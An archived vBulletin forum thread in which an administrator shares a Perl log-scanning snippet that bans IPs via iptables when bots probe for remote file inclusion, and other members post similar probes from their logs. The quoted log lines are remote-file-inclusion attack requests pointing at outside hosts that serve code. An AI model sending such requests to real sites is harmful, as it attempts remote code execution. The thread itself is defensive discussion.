vb.org Archive - Load Relief: Block the sniffers

vb.org Archive (https://vborg.vbsupport.ru/index.php)

- Big Board Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=172)

- - Load Relief: Block the sniffers (https://vborg.vbsupport.ru/showthread.php?t=165477)

Load Relief: Block the sniffers

If you have ever perused your logs on your big board, or any board for that matter, chances are you have seen requests like this:

Code:

/forums/showthread.php?t=http://somehackersite-usually-russian.ru/images/cs.txt?

Basically, there must have been some vulnerability in some version of VB that would probably execute whatever code is at somehackersite-usually-russian.ru/images/cs.txt, or at least display it in a users browser.

For the most part, these have been ferreted out by the VB team so it really isn't much to be worried about as far as security. These are just bots hitting known VB installs trying to recruit machines for some idiots nefarious dealings. If you watch your log in real time however, you can see that this happens over and over.. Multiple IP's from multiple locations. Basically, every time they hit the site, it creates load on the server.

This really annoys me because seriously, it is a waste of resources for not just me, but the hackers themselves. So finally I fired up my Perl scripting and wrote up something that searched the webserver log (access_log) and if it found any attempt to grab a thread starting with http:// it just banned it via iptables.. Here is a snippet:

Code:

open (FH, '/home/mysite/logs/access_log');



@log = <FH>;



close FH;



foreach (@log) {



if ($_ =~ m/showthread.php\?t=http:\/\//) {



# parse out and find IP, ban IP (unless it is mine, or in my range).



}

I won't post the entire code here, but basically it saves the IP's that it bans, to an array, serializes and saves it. Loads it upon script execution, unserializes it, and if a hack attempt is found in the log, and is not in the IP array, proceed to ban the ip with a drop:

Code:

$ban = `/sbin/iptables -I INPUT -s $ipaddress -j DROP`;

I ran this via a cronjob every 15 minutes and over the last 5 days I have banned over 600 IP addresses. Most of these are compromised machines I assume. Watching the logs, I see fewer and fewer hack attempts. The load on the server in question has dropped noticeably. Most of the time, this servers 30 minute average hovered around 0.50 - 0.60, it is now around 0.30 - 0.40.

Of course, the server could just be experiencing a slow week, but the numbers don't really indicate that.

I am considering redoing the script so I can release it to everyone free, it is just cobbled together at the moment so I don't really want to put it up yet.

Has anyone else here run into the same issues? Would anyone here be interested in the PERL script?

Just an update on this... I had to modify my code a bit because for some reason, I set a threshold of 5 offenses by an IP before it would ban them. It was something I had in another application of mine that I carried into it. Now I ban on the first offense.

So far over the last 7 days, 1,259 drops issued to iptables. Load throughout the day continues to drop.

Cool! i like the sound of this not that i own a big board but hey it would help to put it on before it gets to the point you were at no?

I see that kind of link a lot but with my groups :eek:

example:

Attachment 73592

I've seen them a lot this past 2 weeks but only in my groups.. hmmmmm

one was a .text too.

--------------- Added [DATE]1198356811[/DATE] at [TIME]1198356811[/TIME] ---------------

and yet another one just now! AGH!

Guest
Viewing Error Message /groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body? Unknown Location
/groups/groups.php?g=http://migirlsadaoiwqiseatmeisum.mail333.su/body?

Are they trying to hack or use my mail system??

They are just bots scouring the net looking for vulnerabilities so they can exploit them. There is no one person sitting there clicking..

If your software is up to date, chances are, you have nothing to worry about.

A good firewall blocks this sort of attempted exploit automatically. I use Astaro and it blocks 70,000 or more exploits/attacks/probes daily. This is a great system and I sleep a little easier at night. Eric

Quote:

Originally Posted by EricGT (Post 1408718)

Your firewall isn't going to protect your site against such an attack as the firewall has port 80 open, otherwise it would not be serving pages.

If you are serving data dynamically, of course there is a chance someone could hack your system, which is why there are patches for software.

Me thinks the load drop may have more with the Christmas season traffic lull than with the banning of these IP addresses....

X vBulletin 3.8.12 by vBS Debug Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (3)bbcode_code_printable (1)bbcode_quote_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)pagenav (1)pagenav_curpage (1)pagenav_pagelink (1)post_thanks_navbar_search (1)printthread (10)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start pagenav_page pagenav_complete bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages:

Phrase Groups Available:

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01545 seconds Memory Usage 1,738KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (3)bbcode_code_printable (1)bbcode_quote_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)pagenav (1)pagenav_curpage (1)pagenav_pagelink (1)post_thanks_navbar_search (1)printthread (10)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start pagenav_page pagenav_complete bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: